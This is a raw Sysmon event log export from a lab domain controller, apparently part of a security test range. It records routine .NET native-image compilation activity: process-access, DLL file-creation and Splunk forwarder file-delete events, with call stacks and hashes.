21:04:42.772{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EA-60D3-F603-00000000CF01}852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020986Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.756{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EA-60D3-F603-00000000CF01}852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020985Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.756{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EA-60D3-F603-00000000CF01}852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020984Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.740{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D6EF10551835EE6D9A064A7513EED59B,SHA256=A95EE36D40501279941CC786EE58947FC812999033A23F936534DED9C819B79A,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000020983Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:42.725{4DB9351A-A1EA-60D3-F503-00000000CF01}6884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1ae4-0\Microsoft.Windows.HostGuardianService.Plugin.dll2021-06-23 21:04:42.725 10341000x800000000000000020982Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.615{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EA-60D3-F503-00000000CF01}6884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020981Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.584{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1EA-60D3-F503-00000000CF01}6884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020980Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.584{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EA-60D3-F503-00000000CF01}6884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020979Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.459{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0688E0F6F68DC071236C824CD3BAAD5F,SHA256=EF2E3D789E4414AA1641F0F7E5261B3021CE80366D2C78F7521F11D03862D474,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020978Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.459{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EA-60D3-F403-00000000CF01}1768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020977Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.381{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1EA-60D3-F403-00000000CF01}1768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020976Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.365{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EA-60D3-F403-00000000CF01}1768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020975Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:42.334{4DB9351A-A1EA-60D3-F303-00000000CF01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b54-0\Microsoft.Windows.FileServer.Management.ServerManagerProxy.dll2021-06-23 21:04:42.334 10341000x800000000000000020974Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.022{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EA-60D3-F303-00000000CF01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020973Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:41.990{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EA-60D3-F303-00000000CF01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020972Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:41.990{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EA-60D3-F303-00000000CF01}6996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021006Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.865{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E6B211C9CA900664CC7CC6EA16DD6553,SHA256=4C155E14E8052B2C7F33C5760DA95D1CE40B2C56B01A4C2EF33BD59B3C00F333,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021005Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.522{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC663DE9AF98071979D392EE52A2CF7E,SHA256=74C776DE0579186F7C7D5129FFC772948B429BF8719F4B338A7F74DA3840AE93,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021004Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.397{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EB-60D3-FB03-00000000CF01}92C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021003Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.365{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1EB-60D3-FB03-00000000CF01}92C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021002Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.365{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EB-60D3-FB03-00000000CF01}92C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021001Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.256{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EB-60D3-FA03-00000000CF01}6260C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021000Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.225{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EB-60D3-FA03-00000000CF01}6260C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020999Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.225{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EB-60D3-FA03-00000000CF01}6260C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020998Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:43.193{4DB9351A-A1EB-60D3-F903-00000000CF01}3960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f78-0\Microsoft.Windows.ServerManager.BitLocker.Plugin.dll2021-06-23 21:04:43.193 10341000x800000000000000020997Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.116{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EB-60D3-F903-00000000CF01}3960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020996Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.084{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EB-60D3-F903-00000000CF01}3960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020995Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.084{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EB-60D3-F903-00000000CF01}3960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\